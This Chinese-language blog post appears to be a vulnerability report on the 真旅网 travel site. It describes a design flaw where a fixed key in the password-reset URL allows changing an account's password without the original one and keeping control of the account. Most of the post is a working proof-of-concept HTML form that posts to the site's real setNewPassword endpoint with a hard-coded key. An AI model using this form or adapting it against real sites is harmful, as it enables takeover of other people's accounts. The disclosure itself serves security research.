|
真旅网设计缺陷导致持久控制账号及无需原密码修改密码 这个key可以通过
获得 这里可以看到需要原密码 地址栏有个key 放到漏洞证明里面的代码中 无需原密码修改密码 这个key不会变 可以一直这样控制账号
<div class="row gray-border" style="margin-top:20px;">
<h3 class="title"><strong>设置新密码</strong></h3>
<div class="row" style="height:330px;">
<ul class="find_password">
<form action="http://store.tdxinfo.com/tops-front-purchaser/user/setNewPassword" method="post" name="setNewPasswordForm">
<li>
<label><div>新登录密码:</div><input type="password" name="password" class="normal_txt" style="width:150px;"/></label>
</li>
<li>
<label><div>确认新密码:</div><input type="password" name="confirmPassword" class="normal_txt" style="width:150px;" placeholder=""/></label>
</li>
<li>
<div style="margin-left:130px;">
<a class="adaptiveButton brightRed_btn" href="javascript:void(0);" onclick="document.setNewPasswordForm.submit();">
<span class="left"></span>
<span class="center center_1">确 认</span>
<span class="right"></span>
</a>
</div>
</li>
<input name="key" type="hidden" value="546f231545cec70f6b535eda"/>
</form>
</ul>
</div>
</div>
|
-
上一篇: XSS的原理分析与解剖:第四章(编码与绕过) - 网站安全 - 自学php网
下一篇: PageAdmin几个设计缺陷导致的安全漏洞及修复 - 网站安全 - 自学php网
还没有人抢沙发呢~